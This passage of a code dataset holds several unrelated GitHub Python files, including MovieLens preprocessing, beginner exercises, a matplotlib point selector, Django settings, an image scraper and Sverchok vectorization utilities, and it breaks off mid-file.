train_POSMap)\n\n # Get B from File\n isBSaved = False # True to load the B Matrix from a file\n if isBSaved:\n myHmm.loadBFromFile(\"out/BMatrix.npy\", sentObs)\n else:\n myHmm.loadB(sentObs)\n\n # Print the time it takes to generate the B matrix for this model\n print(time() - start_time)\n\n # Generate a large number of sentences with lengths between 6 and 20\n # Save the file as generatedCorpus.csv in the out folder\n numGeneratedSentences = 20000\n myHmm.generateCorpus(numGeneratedSentences , 6, 20, \"generatedCorpus.csv\", True)\n","repo_name":"sggupte/pos-tagging","sub_path":"Generative/textGenerator.py","file_name":"textGenerator.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73686164642","text":"import pandas as pd \r\nimport numpy as np\r\nimport json\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nos.chdir('C:/Kaige_Research/Code/graph_bandit/data_process_code/')\r\ninput_path='../original_data/movielens-20m-dataset/'\r\noutput_path='../original_data/movielens-20m-dataset/processed_data/'\r\nprint(os.listdir(input_path))\r\n\r\ndef remove(sentence):\r\n\ta=sentence.split(' ')\r\n\tb=[]\r\n\tfor i in a:\r\n\t\tb.extend(i.split('|'))\r\n\tc=[]\r\n\tfor i in b:\r\n\t\tc.extend(i.split('('))\r\n\r\n\td=[]\r\n\tfor i in c:\r\n\t\td.extend(i.split(')'))\r\n\treturn d\r\n\r\n\r\nmovie=pd.read_csv(input_path+'movie.csv')\r\nmovie.columns\r\nmovie=movie.loc[:,['movieId', 'title']]\r\nmovie.head(10)\r\n\r\nmovie_id=movie['movieId'].values\r\nmovie_title=movie['title'].values\r\n\r\nnp.save(output_path+'movie_id', movie_id)\r\nnp.save(output_path+'movie_title', movie_title)\r\n\r\nuser_id=[]\r\nuser_movie_id=[]\r\nuser_rating=[]\r\n\r\nchunksize = 10**5\r\nfor chunk in pd.read_csv(input_path+'rating.csv', chunksize=chunksize):\r\n\tuser_id.extend(list(chunk['userId'].values))\r\n\tuser_movie_id.extend(list(chunk['movieId'].values))\r\n\tuser_rating.extend(list(chunk['rating'].values))\r\n\r\nnp.save(output_path+'user_id', 
user_id)\r\nnp.save(output_path+'user_movie_id', user_movie_id)\r\nnp.save(output_path+'user_rating', user_rating)\r\n\r\nunique_user_id=[]\r\nsize=100000\r\nnumber=int(len(user_id)/size)+1\r\nfor i in range(number):\r\n\tprint(i, number)\r\n\tunique_user_id.extend(list(np.unique(user_id[i*size:(i+1)*size])))\r\n\r\nunique_user_id=np.unique(unique_user_id)\r\nnp.save(output_path+'unique_user_id', unique_user_id)\r\n\r\n\r\nuser_num=len(unique_user_id)\r\nuser_movie_dict={}\r\nuser_rating_dict={}\r\n\r\nfor user in unique_user_id:\r\n\tprint(user, user_num)\r\n\tuser_movie_dict[user]=[]\r\n\tuser_rating_dict[user]=[]\r\n\r\n\r\nfor i in range(int(len(user_id)/100)):\r\n\tprint(i)\r\n\tuser=user_id[i]\r\n\tm=user_movie_id[i]\r\n\tr=user_rating[i]\r\n\tuser_movie_dict[user].extend([m])\r\n\tuser_rating_dict[user].extend([r])\r\n\r\n\r\nnp.save(output_path+\"user_movie_dict.npy\", user_movie_dict)\r\nnp.save(output_path+\"user_rating_dict.npy\", user_rating_dict)\r\n\r\n\t\r\nuser_freq_dict={}\r\nfor user in unique_user_id:\r\n\tprint(user, user_num)\r\n\tuser_freq_dict[user]=[]\r\n\r\nfreq_list=np.zeros(len(user_movie_dict.keys()))\r\nfor user in user_movie_dict.keys():\r\n\tprint(user)\r\n\tuser_freq_dict[user]=len(user_movie_dict[user])\r\n\tfreq_list[user-1]=len(user_movie_dict[user])\r\n\r\nnp.save(output_path+\"user_freq_dict.npy\", user_freq_dict)\r\nnp.save(output_path+\"freq_list.npy\", freq_list)\r\n\r\nlen(freq_list[freq_list>100])\r\n\r\ntop_500_user_id=list(np.where(freq_list>=100)[0])\r\ntop_500_user_freq=freq_list[freq_list>=100]\r\nnp.save(output_path+'top_500_user_id', top_500_user_id)\r\nnp.save(output_path+'top_500_user_freq', top_500_user_freq)\r\n\r\n\r\ntop_500_user_film=[]\r\nfor user in top_500_user_id:\r\n\tfilms=user_movie_dict[user]\r\n\ttop_500_user_film.extend(films)\r\n\r\ntop_500_user_film=np.unique(top_500_user_film)\r\nnp.save(output_path+'top_500_user_film_id', top_500_user_film)\r\n\r\nmovie=pd.read_csv(input_path+'movie.csv')\r\nmovie.columns\r\nmovie_id=movie['movieId'].values\r\ngenres=movie['genres'].values\r\nmovie_title=movie['title'].values\r\n\r\ntag=pd.read_csv(input_path+'tag.csv')\r\ntag.columns\r\ntags=tag['tag'].values\r\ntag_movie_id=tag['movieId'].values\r\n\r\nmovie_describe_dict={}\r\nfor m in movie_id:\r\n\tprint(m)\r\n\tmovie_describe_dict[m]=[]\r\n\r\nfor index in range(len(tag_movie_id)):\r\n\tprint(index)\r\n\tm=tag_movie_id[index]\r\n\ttry:\r\n\t\ttag=tags[index]\r\n\t\tmovie_describe_dict[m]+=[tag]\r\n\texcept:\r\n\t\tpass\r\n\r\nfor index in range(len(movie_id)):\r\n\tprint(index)\r\n\tm=movie_id[index]\r\n\ttry:\r\n\t\tge=genres[index]\r\n\t\tmovie_describe_dict[m]+=[ge]\r\n\texcept:\r\n\t\tpass\r\n\r\nfor index in range(len(movie_id)):\r\n\tprint(index)\r\n\tm=movie_id[index]\r\n\ttry:\r\n\t\ttitle=movie_title[index]\r\n\t\tmovie_describe_dict[m]+=[title]\r\n\texcept:\r\n\t\tpass\r\n\r\nnp.save(output_path+'movie_describe_dict.npy', movie_describe_dict)\r\n\r\nfor index in range(len(movie_id)):\r\n\tprint(index)\r\n\tm=movie_id[index]\r\n\ttry:\r\n\t\ta=''\r\n\t\tfor word in movie_describe_dict[m]:\r\n\t\t\ta+=str(word)+' '\r\n\t\tmovie_describe_dict[m]=a\r\n\texcept:\r\n\t\tpass\r\n\r\nimport nltk \r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import PorterStemmer\r\nstop_words=set(stopwords.words('english'))\r\nps=PorterStemmer()\r\n\r\nnew_movie_describe_dict={}\r\nfor m in 
movie_describe_dict.keys():\r\n\ttry:\r\n\t\tprint(m)\r\n\t\tnew_movie_describe_dict[m]=remove(movie_describe_dict[m])\r\n\t\tfiltered_stemm_sent=[]\r\n\t\tfor w in new_movie_describe_dict[m]:\r\n\t\t\tif w not in stop_words:\r\n\t\t\t\tfiltered_stemm_sent.append(ps.stem(w))\r\n\t\tnew_movie_describe_dict[m]=filtered_stemm_sent\r\n\texcept:\r\n\t\tpass\r\n\r\nnp.save(output_path+\"new_movie_describe_dict.npy\", new_movie_describe_dict)\t\r\n\r\nfor index in range(len(movie_id)):\r\n\tprint(index)\r\n\tm=movie_id[index]\r\n\ttry:\r\n\t\ta=''\r\n\t\tfor word in new_movie_describe_dict[m]:\r\n\t\t\ta+=str(word)+' '\r\n\t\tnew_movie_describe_dict[m]=a\r\n\texcept:\r\n\t\tpass\r\n\r\nnp.save(output_path+\"new_movie_describe_dict2.npy\", new_movie_describe_dict)\t\r\n\r\nnew_movie_describe_dict=np.load(output_path+'new_movie_describe_dict2.npy')\r\nnew_movie_describe_dict=new_movie_describe_dict.item()\r\n\r\nfor m in movie_id:\r\n\tprint('movie_id/movie_num', m, len(movie_id))\r\n\tprint('describe', new_movie_describe_dict[m])\r\n\r\nsentence_long_list=[]\r\nfor m in movie_id:\r\n\tsentence_long_list.append(new_movie_describe_dict[m])\r\n\r\nnp.save(output_path+'movie_describe_list.npy',sentence_long_list)\r\n\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nvec = TfidfVectorizer(ngram_range=(1, 2), max_df=0.8, min_df=0.05)\r\nX = vec.fit_transform(sentence_long_list)\r\nX_dense = X.todense()\r\nprint (X_dense[0,:])\r\nprint(X_dense.shape)\r\n\r\ndf_movie_describe=pd.DataFrame(columns=['movieId']+['f_%s'%(s+1) for s in range(X_dense.shape[1])])\r\ndf_movie_describe['movieId']=movie_id\r\ndf_movie_describe[['f_%s'%(s+1) for s in range(X_dense.shape[1])]]=X_dense\r\n\r\ndf_movie_describe.to_csv(output_path+'df_movie_describe_numeric')\r\n\r\nfrom sklearn.decomposition import PCA\r\npca=PCA(n_components=10)\r\nx=pca.fit_transform(X_dense)\r\n\r\ndf_movie_describe_small=pd.DataFrame(columns=['movieId']+['f_%s'%(s+1) for s in range(x.shape[1])])\r\ndf_movie_describe_small['movieId']=movie_id\r\ndf_movie_describe_small[['f_%s'%(s+1) for s in range(x.shape[1])]]=x\r\n\r\ndf_movie_describe_small.to_csv(output_path+'df_movie_describe_numeric_small')\r\n\r\n","repo_name":"yang0110/graph-based-bandit","sub_path":"movilens_data_process.py","file_name":"movilens_data_process.py","file_ext":"py","file_size_in_byte":6274,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"71003080163","text":"import asyncio\nimport os\n\ncurrent_dir = os.getcwd()+\"/zadatak-1\"\n\nasync def afun1(list_names):\n await asyncio.sleep(0.2)\n return [{\"naziv\": name, \"velicina\": os.path.getsize(name)} for name in list_names]\n\n\ndef fun2(list_names):\n for x in list_names:\n f = open(x, 'w')\n for i in range(1, 10001):\n f.write(str(i)+'\\t')\n\n\nasync def main():\n list_names = []\n for i in range(3):\n open(\"datoteka{}\".format(i+1), \"w\")\n list_names.append(\"datoteka{}\".format(i+1))\n fun2(list_names)\n result = await afun1(list_names)\n print(result)\n\nif __name__ == \"__main__\":\n asyncio.run(main())","repo_name":"LoncaricLaura/distsys-zadace","sub_path":"03-zadaci/zadatak-1/zadatak-1.py","file_name":"zadatak-1.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18539901033","text":"'''\n4.7 (Financial application: monetary units) Modify Listing 3.4, ComputeChange.py,\nto display the nonzero denominations only, using singular words for 
single units\nsuch as 1 dollar and 1 penny, and plural words for more than one unit such as 2\ndollars and 3 pennies.\n\n'''\n\n# Receive the amount\namount = eval(input(\"Enter an amount, for example 11.56:\"))\n\n# Convert the amount to cents\nremaining_amount = int(amount * 100)\n\n# Find the number of dollars\nnumber_of_one_dollars = remaining_amount // 100\nremaining_amount = remaining_amount % 100\n\n# Find the number of quarters in the remaining amount\nnumber_of_quarters = remaining_amount // 25\nremaining_amount = remaining_amount % 25\n\n# Find the number of dimes in the remaining amount\nnumber_of_dimes = remaining_amount // 10\nremaining_amount = remaining_amount % 10\n\n# Find the number of nickels in the remaining amount\nnumber_of_nickels = remaining_amount // 5\nremaining_amount = remaining_amount % 5\n\n# Find the number of pennies in the remaining amount\nnumber_of_pennies = remaining_amount\n\n# Display the result\nprint(f\"Your amount {amount} consists of:\\n\")\n\nif number_of_one_dollars != 0:\n    if number_of_one_dollars > 1:\n        print(f\"\\t {number_of_one_dollars} Dollars\\n\")\n    else:\n        print(f\"\\t {number_of_one_dollars} Dollar\\n\")\nif number_of_quarters != 0:\n    if number_of_quarters > 1:\n        print(f\"\\t {number_of_quarters} Quarters\\n\")\n    else:\n        print(f\"\\t {number_of_quarters} Quarter\\n\")\nif number_of_dimes != 0:\n    if number_of_dimes > 1:\n        print(f\"\\t {number_of_dimes} Dimes\\n\")\n    else:\n        print(f\"\\t {number_of_dimes} Dime\\n\")\nif number_of_nickels != 0:\n    if number_of_nickels > 1:\n        print(f\"\\t {number_of_nickels} Nickels\\n\")\n    else:\n        print(f\"\\t {number_of_nickels} Nickel\\n\")\nif number_of_pennies != 0:\n    if number_of_pennies > 1:\n        print(f\"\\t {number_of_pennies} Pennies\\n\")\n    else:\n        print(f\"\\t {number_of_pennies} Penny\\n\")","repo_name":"musawakiliML/Python-Exercises","sub_path":"Introduction to Programming using Python/Chapter 4/Ex4.7.py","file_name":"Ex4.7.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"27896673361","text":"#%% \nimport logging\nfrom dataclasses import dataclass\nfrom tkinter import Tk\nfrom tkinter.filedialog import askopenfilename\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom npp_materialslab_tools import TensileData\nfrom npp_materialslab_tools.plottools import Cursor\n\n# DEVELOPMENT_FLAG = True\n# DEVELOPMENT_FNAME = \"testingMachine/data/new XY 0 ABS_CNT 2%.csv\" \n\n# if DEVELOPMENT_FLAG:\n#     logging.basicConfig(level=logging.DEBUG)\n# else:\n#     logging.basicConfig(level=logging.ERROR)\nclass PointsSelector2():\n    def __init__(self, fig, ax):\n\n        self.fig = fig\n        self.ax = ax\n        self.fig.canvas.mpl_connect('button_press_event', self.mouse_click)\n\n        self.reset_SM()\n    \n    def reset_SM(self):\n        ''' resets state machine status'''\n        self._points_collected = {}\n        self._sm = 0\n        # self.txt.set_text('')\n\n        # self.ax.cla()\n\n    def _calc_x_y_ind(self, x_event, y_event ):\n        ''' calculates the x, y and index from the event data\n\n        It does that by finding the closest point.\n\n        Callers: mouse_click\n        '''\n        try:\n            line = self.ax.lines[0]\n            self.xdata = line.get_xdata()\n            self._F_Ns = line.get_ydata()\n            indx = min(np.searchsorted(self.xdata, x_event), len(self.xdata) - 1)\n            x = self.xdata[indx]\n            y = self._F_Ns[indx]\n            return x, y, indx \n        except:\n            return \n\n    def mouse_click(self, event):\n        ''' change the state machine on each click\n        ''' \n        if not event.inaxes:\n            # only continue when a point is picked\n            
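# event.inaxes is None when the click falls outside the axes, so there\n            # is no data point to snap a cursor to and the state machine is left unchanged\n            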
return\n\n # update state machine\n if self._sm == 0:\n crsrID = self._sm+1\n x,y, indx = self._calc_x_y_ind(event.xdata, event.ydata)\n # update the line positions\n self._points_collected[crsrID] = Cursor(self.ax, crsrID, x, y, indx)\n self._points_collected[crsrID].plot_cursor()\n self._sm = 1\n elif self._sm == 1:\n crsrID = self._sm+1\n x,y, indx = self._calc_x_y_ind(event.xdata, event.ydata)\n # update the line positions\n self._points_collected[crsrID] = Cursor(self.ax, crsrID, x, y, indx)\n self._points_collected[crsrID].plot_cursor()\n \n self._sm = 2 \n if self._sm ==2:\n logging.debug (\"ready to plot\")\n # self.computations()\n pass\n else:\n print (\"State status: {} | x={:1.2f}, y={:1.2f}\".format(self._sm,x,y))\n self.ax.figure.canvas.draw()\n","repo_name":"npapnet/hmu.materialslab.tools","sub_path":"pypkg/npp_materialslab_tools/plottools/point_selector2.py","file_name":"point_selector2.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"42842800118","text":"import os\nfrom .base import *\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': 'django_db', # Or path to database file if using sqlite3.\n 'USER': 'django_login', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': 'LOCALHOST', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\nSTATIC_ROOT = PROJECT_DIR\n\n\nSECRET_KEY = os.environ[\"SECRET_KEY\"]\n\nINSTALLED_APPS += (\"debug_toolbar\",)\nINTERNAL_IPS = (\"127.0.0.1\",)\nMIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)\n\nALLOWED_HOSTS = []\n","repo_name":"parlarjb/toy_blog","sub_path":"toy_blog/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15830379643","text":"import os\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndata_folder = 'C:/Users/админ/PycharmProjects/PDS2/PDS2_Kofanov/My_project/dataset_parser'\n\n\n\nfruit_n_vegetables_eng = ['avocado', 'orange', 'banana', 'beets', 'grapes', 'grapefruit',\n 'cabbage', 'potatoes', 'kiwi', 'lemon', 'carrot', 'cucumber', 'bell pepper',\n 'champignon', 'tomato', 'green onion', 'onion', 'garlic', 'apples', 'ginger']\n\nfruit_n_vegetables_fr = ['avocat', 'orange', 'banane', 'betterave', 'raisin', 'pamplemousse',\n 'chou', 'pomme de terre', 'kiwi', 'citron', 'carotte', 'concombre', 'poivron',\n 'champignon', 'tomate', 'oignon vert', 'oignon', 'ail', 'pomme', 'gingembre']\n\nfruit_n_vegetables_sp = ['aguacate', 'naranja', 'plátano', 'remolacha', 'uva', 'pomelo',\n 'repollo', 'papa', 'kiwi', 'limón', 'zanahoria', 'pepino', 'pimiento morrón',\n 'hongo', 'tomate', 'cebolla verde', 'cebolla', 'ajo', 'manzana', 'jengibre']\n\nfruit_n_vegetables_shv = ['avokado', 'apelsin', 'banan', 'rödbetor', 'grape', 'grapefrukt',\n 'kål', 'potatis', 'kiwi', 'citron', 'morot', 'gurka', 'peppar',\n 'svamp', 'tomat', 'grön lök', 'lök', 'vitlök', 'äpple', 'ingfära']\n\nfruit_n_vegetables_de = ['Avocado', 'Orange', 'Banane', 'Rüben', 'Trauben', 'Grapefruit',\n 'Kohl', 'Kartoffeln', 'Kiwi', 'Zitrone', 'Karotte', 'Gurke', 'Paprika',\n 'Champignon', 'Tomate', 'Frühlingszwiebel', 'Zwiebel', 'Knoblauch', 
'Äpfel', 'Ingwer']\n\nfruit_n_vegetables_it = ['avocado', 'arancia', 'banana', 'barbabietola', 'uva', 'pompelmo', 'cavolo',\n 'patate', 'kiwi', 'limone', 'carota', 'cetriolo', 'peperone', 'champignon',\n 'pomodoro', 'cipolla verde', 'cipolla', 'aglio', 'mele', 'zenzero']\n\nfruit_n_vegetables_tr = ['avokado', 'portakal', 'muz', 'pancar', 'üzüm', 'greyfurt',\n 'lahana', 'patates', 'kivi', 'limon', 'havuç', 'salatalık', 'biber',\n \"mantar\", \"domates\", \"yeşil soğan\", \"soğan\", \"sarımsak\", \"elma\", \"zencefil\"]\n\nfruit_n_vegetables_gr = ['αβοκάντο', 'πορτοκάλι', 'μπανάνα', 'παντζάρια', 'σταφύλι', 'γκρέιπφρουτ',\n 'λάχανο', 'πατάτα', 'ακτινίδιο', 'λεμόνι', 'καρότο', 'αγγούρι', 'πιπεριά',\n 'μανιτάρι', 'ντομάτα', 'πράσινο κρεμμύδι', 'κρεμμύδι', 'σκόρδο', 'μήλο', 'τζίντζερ']\n\nfruit_n_vegetables_uk = ['авокадо', 'апельсин', 'банан', 'буряк', 'виноград', 'грейпфрут',\n 'капуста', 'картопля', 'ківі', 'лимон', 'морква', 'огірок', 'перець болгарський',\n 'печериця', 'помідор', 'цибуля зелена', 'цибуля', 'часник', 'яблука', 'імбир']\n\n\n\n\nlibrary_list = [fruit_n_vegetables_eng, fruit_n_vegetables_fr, fruit_n_vegetables_sp, fruit_n_vegetables_shv,\n fruit_n_vegetables_de, fruit_n_vegetables_it, fruit_n_vegetables_tr, fruit_n_vegetables_gr,\n fruit_n_vegetables_uk]\n\ndef scrape_images(query, num_images, save_dir, num_lib):\n query = query.split()\n query = '+'.join(query)\n url = \"https://www.google.co.in/search?q=\"+query+\"&source=lnms&tbm=isch\"\n header = {'User-Agent': 'Mozilla/5.0'}\n soup = BeautifulSoup(requests.get(url, headers=header).content, 'html.parser')\n images = [a['src'] for a in soup.find_all(\"img\", {\"src\": True})]\n images = images[1:num_images+1]\n for i, image in enumerate(images):\n try:\n print(f\"{num_lib}.{query}.{i+1}\")\n filename = f\"{query}_{num_lib}_{i+1}.jpg\"\n filepath = os.path.join(save_dir, filename)\n urllib.request.urlretrieve(image, filepath)\n except:\n continue\n\n\nif not os.path.exists(data_folder):\n os.makedirs(data_folder)\n for folders in fruit_n_vegetables_eng:\n os.makedirs(os.path.join(data_folder, folders))\n\nnum_library = 0\nfor library in library_list:\n num_library += 1\n for n in range(len(library)):\n path_to_folder = os.path.join(data_folder, fruit_n_vegetables_eng[n])\n scrape_images(library[n], 100, path_to_folder, num_library)\n\n\n\n\n","repo_name":"KofanovE/PDS2_Kofanov","sub_path":"My_project/parser_images.py","file_name":"parser_images.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37781024560","text":"from functools import wraps\nfrom typing import List, Tuple\n\nimport numpy as np\n\nfrom mathutils import Matrix\n\nfrom sverchok.data_structure import fixed_iter, levels_of_list_or_np, numpy_full_list\n\nSvVerts = List[Tuple[float, float, float]]\nSvEdges = List[Tuple[int, int]]\nSvPolys = List[List[int]]\n\n\ndef match_sockets(*sockets_data):\n \"\"\"\n data1 = [[1,2,3]]\n data2 = [[4,5], [6,7]]\n data3 = [[8]]\n for d1, d2, d3 in match_sockets(data1, data2, data3):\n print(f\"{d1=}, {d2=}, {d3=}\")\n # print(1) d1=[1,2,3], d2=[4,5,5], d3=[8]\n # print(2) d2=[1,2,3], d2=[6,7,7], d3=[8]\n \"\"\"\n obj_len = max(len(data) for data in sockets_data) if sockets_data else 0\n sockets_data = [fixed_iter(d, obj_len) for d in sockets_data]\n for objects in zip(*sockets_data):\n data_len = max(len(d) for d in objects)\n layer_data = []\n for data in objects:\n if len(data) != data_len and len(data) > 1:\n if 
isinstance(data, np.ndarray):\n                    data = numpy_full_list(data, data_len)\n                else:  # Python list?\n                    data = list(fixed_iter(data, data_len))\n            layer_data.append(data)\n        yield layer_data\n\n\ndef vectorize(func=None, *, match_mode=\"REPEAT\"):\n    \"\"\"\n    Given a function that takes some values, this decorator makes it possible\n    to call the function with lists of values of any nesting shape\n    Take care to annotate the decorated function properly\n    Use Tuple[] in the return annotation only if you want the decorator to split the return values into different lists\n\n    ++ Example ++\n\n    from sverchok.utils import vectorize\n\n    def main_node_logic(*, prop_a: List[float], prop_b: Matrix, mode_a: str) -> Tuple[list, list]:\n        ...\n        return data1, data2\n\n    class MyNode:\n        ...\n        def process(self):\n            input_a = self.inputs[0].sv_get(default=None)\n            input_b = self.inputs[1].sv_get(default=None)\n\n            main_node_logic = vectorize(main_node_logic, match_mode=self.match_mode)\n            out1, out2 = main_node_logic(prop_a=input_a, prop_b=input_b, mode_a=self.mode_a)\n\n            self.outputs[0].sv_set(out1)\n            self.outputs[1].sv_set(out2)\n    \"\"\"\n\n    # this condition only works when used via \"@\" syntax\n    if func is None:\n        return lambda f: vectorize(f, match_mode=match_mode)\n\n    @wraps(func)\n    def wrap(*args, **kwargs):\n\n        # it's better not to use positional arguments for backward compatibility\n        # in this case a function can get new arguments\n        if args:\n            raise TypeError(f'Vectorized function {func.__name__} should not have positional arguments')\n\n        walkers = []\n        for key, data in zip(kwargs, kwargs.values()):\n            if data is None or data == []:\n                walkers.append(EmptyDataWalker(data, key))\n            else:\n                annotation = func.__annotations__.get(key)\n                nesting_level = _get_nesting_level(annotation) if annotation else 0\n                walkers.append(DataWalker(data, output_nesting=nesting_level, mode=match_mode, data_name=key))\n\n        # this is a corner case; it can't be handled via the walk_data iterator\n        if all([w.what_is_next() == DataWalker.VALUE for w in walkers]):\n            return func(*args, **kwargs)\n\n        out_number = _get_output_number(func)\n\n        # handle the case when the decorated function returns a single value\n        if out_number == 1:\n            out_list = []\n            for match_args, result in walk_data(walkers, [out_list]):\n                match_args, match_kwargs = match_args[:len(args)], match_args[len(args):]\n                match_kwargs = {n: d for n, d in zip(kwargs, match_kwargs)}\n                func_out = func(*match_args, **match_kwargs)\n                if not is_empty_out(func_out):\n                    result[0].append(func_out)\n            return out_list\n\n        # the case when the return value is a tuple of multiple values\n        else:\n            out_lists = [[] for _ in range(out_number)]\n            for match_args, result in walk_data(walkers, out_lists):\n                match_args, match_kwargs = match_args[:len(args)], match_args[len(args):]\n                match_kwargs = {n: d for n, d in zip(kwargs, match_kwargs)}\n                func_out = func(*match_args, **match_kwargs)\n                [r.append(out) for r, out in zip(result, func_out) if not is_empty_out(out)]\n            return out_lists\n\n    def is_empty_out(value):\n        if value is None:\n            return True\n        try:\n            return not bool(len(value))\n        except TypeError:\n            return False\n\n    return wrap\n\n\ndef devectorize(func=None, *, match_mode=\"REPEAT\"):\n    \"\"\"It takes a list of values of arbitrary shape, flattens it\n    and calls the decorated function once with the flattened data.\n    This is needed for functions (nodes) which break vectorization\"\"\"\n\n    # this condition only works when used via \"@\" syntax\n    if func is None:\n        return lambda f: devectorize(f, match_mode=match_mode)\n\n    @wraps(func)\n    def 
wrap(*args, **kwargs):\n\n # it's better not to use positional arguments for backward compatibility\n # in this case a function can get new arguments\n if args:\n raise TypeError(f'Vectorized function {func.__name__} should not have positional arguments')\n\n walkers = []\n for key, data in zip(kwargs, kwargs.values()):\n if data is None or data == []:\n walkers.append(EmptyDataWalker(data, key))\n else:\n annotation = func.__annotations__.get(key)\n nesting_level = _get_nesting_level(annotation) if annotation else 0\n walkers.append(DataWalker(data, output_nesting=nesting_level - 1, mode=match_mode, data_name=key))\n\n flat_data = {key: [] for key in kwargs}\n for match_args, _ in walk_data(walkers, []):\n match_args, match_kwargs = match_args[:len(args)], match_args[len(args):]\n [container.append(data) for container, data in zip(flat_data.values(), match_kwargs)]\n\n return func(**flat_data)\n\n return wrap\n\n\ndef _get_nesting_level(annotation) -> int:\n \"\"\"It measures how many nested types the annotation has\n simple annotations like string, float have 0 level\n list without arguments gives 1 level\n List[list] such thing returns 2 level\"\"\"\n if not hasattr(annotation, '__origin__'):\n if annotation in [list, tuple]:\n return 1\n elif annotation in [float, int, bool, Matrix, str]:\n return 0\n\n elif annotation.__origin__ is list:\n return 1 + _get_nesting_level(annotation.__args__[0])\n elif annotation.__origin__ is tuple:\n # not sure how this should act if arguments of the tuple have different level of nesting\n return 1 + max([_get_nesting_level(arg) for arg in annotation.__args__])\n\n raise NotImplementedError(f'Given annotation: {annotation} is not supported yet')\n\n\ndef _get_output_number(function):\n \"\"\"Returns number of arguments returning by given function\n the function should have returning annotation with Tuple value - Tuple[list, list]\"\"\"\n annotation = function.__annotations__.get('return')\n if annotation:\n if hasattr(annotation, '__origin__') and annotation.__origin__ == tuple:\n if hasattr(annotation, '__args__'):\n return len(annotation.__args__)\n return 1\n\n\ndef _what_is_next_catch(func):\n \"\"\"It's exclusively for using in DataWalker class for optimization performance\"\"\"\n\n @wraps(func)\n def what_is_next_catcher(self):\n next_val_id = id(self._stack[-1])\n if next_val_id not in self._catch:\n # this should not conflict with float, string, integer and other values\n self._catch[next_val_id] = func(self)\n return self._catch[next_val_id]\n\n return what_is_next_catcher\n\n\nclass DataWalker:\n \"\"\"This class allows walk over a list of arbitrary shape like over a tree data structure\n Input data can be a value or list\n the list can include values and / or other lists\n the value itself can be just a number, list of numbers, list of list of numbers etc.\n values should be consistent and should not include other values\n for example inside list of vertices there should be other lists of vertices or any thing else\n there is no way of handling such data structure efficiently\"\"\"\n\n # match modes\n SHORT, CYCLE, REPEAT, XREF, XREF2 = \"SHORT\", \"CYCLE\", \"REPEAT\", \"XREF\", \"XREF2\"\n\n # node types\n VALUE, END, SUB_TREE = \"VALUE\", \"END\", \"SUB_TREE\"\n\n EXIT_VALUE = type('ExitValue', (), {'__repr__': lambda s: \"<ExitValue>\"})()\n\n def __init__(self, data, output_nesting=0, mode=REPEAT, data_name=None):\n self.match_mode = mode\n\n self._stack = [data]\n self._output_nesting = output_nesting\n self._name = data_name\n\n 
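# cache keyed by id() of the node on top of the stack; the\n        # _what_is_next_catch decorator uses it so repeated what_is_next()\n        # calls on the same node skip re-measuring its nesting level\n        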
self._catch = dict() # for optimization\n\n def step_down_matching(self, match_len, match_mode):\n # todo protection from little nesting\n if self.what_is_next() == DataWalker.SUB_TREE:\n current_node = self._stack.pop()\n elif self.what_is_next() == DataWalker.VALUE:\n current_node = [self._stack.pop()]\n else:\n raise RuntimeError(f'Step down is impossible current position is: {self._stack[-1]}')\n\n self._stack.append(DataWalker.EXIT_VALUE)\n self._stack.extend(list(reversed(self._match_values(current_node, match_len, match_mode))))\n\n def step_up(self):\n if self.what_is_next() != DataWalker.END:\n raise RuntimeError(f'There are still values to read: {self._stack}')\n self._stack.pop()\n\n def pop_next_value(self):\n return self._stack.pop()\n\n # this method is used most extensively\n @_what_is_next_catch\n def what_is_next(self):\n if self._stack[-1] is DataWalker.EXIT_VALUE:\n return DataWalker.END\n if isinstance(self._stack[-1], (list, tuple, np.ndarray)):\n nesting = levels_of_list_or_np(self._stack[-1])\n else:\n nesting = 0\n if nesting == self._output_nesting:\n return DataWalker.VALUE\n else: # todo add the case when next element has too less nested levels\n return DataWalker.SUB_TREE\n\n @property\n def next_values_number(self):\n try:\n if self.what_is_next() == DataWalker.VALUE:\n return 1\n last = self._stack[-1]\n return len(last)\n except (IndexError, TypeError):\n return 0\n\n @property\n def is_exhausted(self):\n return not bool(self._stack)\n\n @staticmethod\n def _match_values(data, match_len, match_mode):\n if len(data) > match_len:\n return data[:match_len]\n elif len(data) == match_len:\n return data\n else:\n if match_mode == DataWalker.REPEAT:\n return list(data) + [data[-1]] * (match_len - len(data)) # todo deepcopy ??\n # todo add other modes\n\n def __repr__(self):\n return f\"<DataWalker {self._name if self._name else 'data'}: {self._stack}>\"\n\n\nclass EmptyDataWalker:\n \"\"\"Use this (instead of DataWalker) if a channel does not has any data\n It is needed not to overcomplicate logic of DataWalker\"\"\"\n\n def __init__(self, data=None, data_name=None):\n self._data = data\n self._name = data_name\n\n def step_down_matching(self, *_, **__):\n pass\n\n def step_up(self):\n pass\n\n def pop_next_value(self):\n return self._data\n\n def what_is_next(self):\n return 